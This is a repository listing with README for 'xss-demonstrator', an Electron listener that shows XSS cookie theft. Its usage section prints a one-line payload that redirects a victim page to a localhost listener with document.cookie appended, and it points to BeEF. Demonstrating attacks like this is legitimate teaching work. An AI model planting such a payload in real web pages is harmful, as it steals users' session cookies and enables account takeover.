https://github.com/nolze/xss-demonstrator
A simple interactive listener for demonstrating XSS attacks
https://github.com/nolze/xss-demonstrator
electron listener server xss
Last synced: 2 months ago
JSON representation
A simple interactive listener for demonstrating XSS attacks
- Host: GitHub
- URL: https://github.com/nolze/xss-demonstrator
- Owner: nolze
- License: mit
- Created: 2018-05-03T23:42:54.000Z (about 8 years ago)
- Default Branch: master
- Last Pushed: 2018-05-03T23:43:23.000Z (about 8 years ago)
- Last Synced: 2025-04-02T10:24:23.033Z (about 1 year ago)
- Topics: electron, listener, server, xss
- Language: JavaScript
- Size: 136 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.md
Awesome Lists containing this project
README
# xss-demonstrator
A simple interactive listener for demonstrating XSS attacks.
## Usage
1\. Start demonstrator
```
npm start
```
2\. Execute an XSS payload on the victim webpage
```js
window.location = "http://localhost:8080/?" + document.cookie
```
3\. The webpage is opened with the stolen cookies in demonstrator
## Example
1\. Start demonstrator
```
npm start
```
2\. Start the example server
```
cd example
node server.js
```
3\. Open
## Todo
* [ ] Add config feature
* [ ] Complete packaging
* [ ] Add tunneling proxy feature
* [ ] Add more information gathering features
* [ ] Add tests
* [ ] Add icon
* [ ] Add auto update
## See also
* BeEF (for advanced purposes)